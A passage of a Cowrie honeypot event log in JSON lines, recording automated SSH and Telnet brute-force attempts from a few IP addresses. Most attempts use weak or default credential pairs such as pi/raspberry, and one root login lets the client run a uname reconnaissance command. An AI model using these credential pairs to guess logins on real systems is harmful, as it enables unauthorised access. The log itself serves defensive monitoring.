{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:14.747788Z","src_ip":"212.227.125.160","session":"f23894541383"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:14.939901Z","src_ip":"212.227.125.160","session":"f23894541383"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:15.998754Z","src_ip":"212.227.125.160","session":"f23894541383"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":33150,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bdef3cd7ccc","protocol":"ssh","message":"New connection: 93.123.109.189:33150 (1.2.3.4:22) [session: 1bdef3cd7ccc]","sensor":"my-vps","timestamp":"2025-08-26T22:02:19.983444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:19.984619Z","src_ip":"93.123.109.189","session":"1bdef3cd7ccc"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.004978Z","src_ip":"93.123.109.189","session":"1bdef3cd7ccc"}
{"eventid":"cowrie.login.failed","username":"solana","password":"solana","message":"login attempt [solana/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.065632Z","src_ip":"93.123.109.189","session":"1bdef3cd7ccc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54918,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1116088d49c","protocol":"ssh","message":"New connection: 212.227.125.160:54918 (1.2.3.4:22) [session: a1116088d49c]","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.343755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.345384Z","src_ip":"212.227.125.160","session":"a1116088d49c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.517325Z","src_ip":"212.227.125.160","session":"a1116088d49c"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:20.911128Z","src_ip":"212.227.125.160","session":"a1116088d49c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:21.086269Z","src_ip":"93.123.109.189","session":"1bdef3cd7ccc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:21.963536Z","src_ip":"212.227.125.160","session":"a1116088d49c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59971,"dst_ip":"1.2.3.4","dst_port":23,"session":"78551a679b29","protocol":"telnet","message":"New connection: 212.227.125.160:59971 (1.2.3.4:23) [session: 78551a679b29]","sensor":"my-vps","timestamp":"2025-08-26T22:02:25.386633Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50304,"dst_ip":"1.2.3.4","dst_port":22,"session":"b28e3b63c019","protocol":"ssh","message":"New connection: 212.227.125.160:50304 (1.2.3.4:22) [session: b28e3b63c019]","sensor":"my-vps","timestamp":"2025-08-26T22:02:26.030289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:26.031060Z","src_ip":"212.227.125.160","session":"b28e3b63c019"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:26.110177Z","src_ip":"212.227.125.160","session":"b28e3b63c019"}
{"eventid":"cowrie.login.failed","username":"mail","password":"mail","message":"login attempt [mail/mail] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:26.247272Z","src_ip":"212.227.125.160","session":"b28e3b63c019"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:27.341430Z","src_ip":"212.227.125.160","session":"b28e3b63c019"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45692,"dst_ip":"1.2.3.4","dst_port":22,"session":"6380fbe2265f","protocol":"ssh","message":"New connection: 212.227.125.160:45692 (1.2.3.4:22) [session: 6380fbe2265f]","sensor":"my-vps","timestamp":"2025-08-26T22:02:31.630044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:31.633129Z","src_ip":"212.227.125.160","session":"6380fbe2265f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:31.681573Z","src_ip":"212.227.125.160","session":"6380fbe2265f"}
{"eventid":"cowrie.login.failed","username":"devmon","password":"devmon","message":"login attempt [devmon/devmon] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:31.900069Z","src_ip":"212.227.125.160","session":"6380fbe2265f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:32.953353Z","src_ip":"212.227.125.160","session":"6380fbe2265f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41004,"dst_ip":"1.2.3.4","dst_port":22,"session":"2475f980d65f","protocol":"ssh","message":"New connection: 212.227.125.160:41004 (1.2.3.4:22) [session: 2475f980d65f]","sensor":"my-vps","timestamp":"2025-08-26T22:02:37.498843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:37.504106Z","src_ip":"212.227.125.160","session":"2475f980d65f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:37.548408Z","src_ip":"212.227.125.160","session":"2475f980d65f"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:38.028546Z","src_ip":"212.227.125.160","session":"2475f980d65f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:39.088479Z","src_ip":"212.227.125.160","session":"2475f980d65f"}
{"eventid":"cowrie.session.closed","duration":14.398516178131104,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:39.785048Z","src_ip":"212.227.125.160","session":"78551a679b29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36466,"dst_ip":"1.2.3.4","dst_port":22,"session":"58e915c45c01","protocol":"ssh","message":"New connection: 212.227.125.160:36466 (1.2.3.4:22) [session: 58e915c45c01]","sensor":"my-vps","timestamp":"2025-08-26T22:02:43.856124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:44.109893Z","src_ip":"212.227.125.160","session":"58e915c45c01"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:44.110594Z","src_ip":"212.227.125.160","session":"58e915c45c01"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:44.924589Z","src_ip":"212.227.125.160","session":"58e915c45c01"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:45.985289Z","src_ip":"212.227.125.160","session":"58e915c45c01"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60084,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5b5241e348f","protocol":"ssh","message":"New connection: 212.227.125.160:60084 (1.2.3.4:22) [session: e5b5241e348f]","sensor":"my-vps","timestamp":"2025-08-26T22:02:49.018924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:49.020738Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:49.418478Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-26T22:02:50.409584Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T22:02:51.022559Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T22:02:51.023439Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:51.138773Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:51.140537Z","src_ip":"212.227.125.160","session":"e5b5241e348f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55474,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4a26778308f","protocol":"ssh","message":"New connection: 212.227.125.160:55474 (1.2.3.4:22) [session: c4a26778308f]","sensor":"my-vps","timestamp":"2025-08-26T22:02:54.913901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:02:54.914881Z","src_ip":"212.227.125.160","session":"c4a26778308f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:02:54.977342Z","src_ip":"212.227.125.160","session":"c4a26778308f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"hadoop123","message":"login attempt [hadoop/hadoop123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:02:55.123894Z","src_ip":"212.227.125.160","session":"c4a26778308f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:02:56.192271Z","src_ip":"212.227.125.160","session":"c4a26778308f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50860,"dst_ip":"1.2.3.4","dst_port":22,"session":"b769db0b2ffb","protocol":"ssh","message":"New connection: 212.227.125.160:50860 (1.2.3.4:22) [session: b769db0b2ffb]","sensor":"my-vps","timestamp":"2025-08-26T22:03:00.024734Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:03:00.083603Z","src_ip":"212.227.125.160","session":"b769db0b2ffb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh